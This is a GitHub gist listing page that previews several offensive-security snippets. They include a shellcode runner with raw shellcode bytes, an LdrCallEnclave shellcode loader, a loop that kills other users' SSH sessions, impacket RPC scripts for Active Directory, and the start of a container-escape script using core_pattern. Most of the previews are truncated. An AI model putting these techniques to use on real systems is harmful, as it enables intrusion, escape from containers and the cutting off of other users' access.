5 min POC inspired by https://x.com/IceSolst/status/1986764951940124676?s=20
# Install MariaDB
sudo dnf install mariadb-server mariadb -y
# Start and enable service
sudo systemctl start mariadb
sudo systemctl enable mariadb
emdnaia
/ fdtable_intmax_poc.c
Created
October 20, 2025 00:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ## File Descriptor INT_MAX Overflow | |
| ---- | |
| - Info: | |
| Tweet: https://x.com/spendergrsec/status/1958264076162998771 | |
| Ref: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04a2c4b4511d186b0fce685da21085a5d4acd370 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MY_TTY=$(tty | sed 's/\/dev\///') | |
| MY_SESSION_PIDS=$(ps aux | grep "sshd-session.*$MY_TTY" | awk '{print $2}' | tr '\n' '|' | sed 's/|$//') | |
| echo "Protecting PIDs: $MY_SESSION_PIDS" | |
| while true; do | |
| ps aux | grep 'sshd-session' | grep -v grep | grep -v '\[listener\]' | awk '{print $2}' | grep -vE "^($MY_SESSION_PIDS)$" | xargs -r kill -9 2>/dev/null | |
| sleep 0.01 # Check every 10ms - way faster | |
| done |
emdnaia
/ JasonToddIsTheBestRobin.c
Created
September 25, 2025 17:25
— forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
emdnaia
/ enclave.c
Created
August 3, 2025 22:56
— forked from whokilleddb/enclave.c
Run shellcode using LdrCallEnclave
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| // Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12 | |
| // Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll | |
| EXTERN_C NTSYSAPI | |
| NTSTATUS | |
| NTAPI LdrCallEnclave( | |
| _In_ PENCLAVE_ROUTINE Routine, |
emdnaia
/ nginx-reverse-proxy-sing-box.conf
Created
March 19, 2025 02:14
— forked from bitcoinvps/nginx-reverse-proxy-sing-box.conf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| stream { | |
| map $ssl_preread_server_name $singbox { | |
| trojan.example.com trojan; | |
| trojan-ws.example.com trojan-ws; | |
| trojan-ws-6.example.com trojan-ws-6; | |
| vmess.example.com vmess; | |
| vmess-ws.example.com vmess-ws; | |
| vmess-ws-6.example.com vmess-ws-6; | |
| } | |
| upstream trojan { |
emdnaia
/ lsarlookupsids3_aes.py
Created
February 6, 2025 22:56
— forked from ThePirateWhoSmellsOfSunflowers/lsarlookupsids3_aes.py
Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) (AES version)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc | |
| from impacket.uuid import bin_to_uuidtup | |
| from binascii import unhexlify | |
| from random import randbytes | |
| import sys | |
| # Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) | |
| # Pure TCP RPC is used (ncacn_ip_tcp option) | |
| # AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848) | |
| # Tested with impacket 0.12.0 on GOAD |
emdnaia
/ Dockerfile
Created
December 16, 2024 04:05
— forked from HoKim98/Dockerfile
Multi-screen (Multi-GPU) XFCE Settings
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copyright (c) 2023 Ho Kim ([email protected]). All rights reserved. | |
| # Configure environment variables | |
| ARG ROCKYLINUX_VERSION="8" | |
| # Be ready for serving | |
| FROM "quay.io/rockylinux/rockylinux:${ROCKYLINUX_VERSION}" as base | |
| # Install desktop environment dependencies | |
| RUN dnf install -y \ |
emdnaia
/ atexec_rpc.py
Created
November 29, 2024 04:41
— forked from ThePirateWhoSmellsOfSunflowers/atexec_rpc.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Impacket - Collection of Python classes for working with network protocols. | |
| # | |
| # Copyright Fortra, LLC and its affiliated companies | |
| # | |
| # All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. |
emdnaia
/ core_pattern_escape.sh
Created
October 26, 2024 19:19
— forked from magisterquis/core_pattern_escape.sh
Script to escape a container with /proc/sys/kernel/core_pattern reusing the existing shell's stdio
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # core_pattern_escape.sh | |
| # Simple script to escape a container via /proc/sys/kernel/core_pattern | |
| # By J. Stuart McMurray | |
| # Created 20241026 | |
| # Last Modified 20241026 | |
| # Drop to /esc (or whatever name) in a container and... | |
| # |
NewerOlder